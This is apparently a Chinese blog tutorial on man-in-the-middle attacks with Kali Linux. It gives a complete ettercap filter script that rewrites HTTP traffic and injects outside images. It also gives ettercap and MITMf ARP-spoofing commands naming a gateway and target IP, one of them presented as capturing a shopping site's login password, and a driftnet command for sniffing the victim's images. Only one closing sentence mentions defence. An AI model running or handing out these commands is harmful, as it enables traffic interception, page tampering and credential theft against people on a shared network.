发布于2022年11月4日3年前 工具介绍ettercapmitmtf3070网卡(大力推荐)ettercap进行中间人攻击替换图片先利用vim新建一个 kali.filter写入下面代码并保存if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); }将其转变为二进制文件etterfilter kali.filter -o kali.ef执行命令ettercap -T -q -F ig.ef -M ARP /目标ip///效果如下mitmf操作替换网页中的图片首先在root下创建一个img的文件夹,在文件夹中放入图片。执行命令python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/imgPS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。访问某宝效果如下:获取某宝登录密码python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202将所有的图片选择180°python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet其他命令可以参考官网,这里不在演示。嗅探浏览的图片在通过ettercap进行中间人攻击后,我们可以利用driftnet来获取对方浏览的图片。命令如下:driftnet -i waln0防御可以在路由器防火墙中开启arp攻击,来防御中间人攻击。mitmf安装参考文章: kali安装MITMF Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook ... 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/825.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见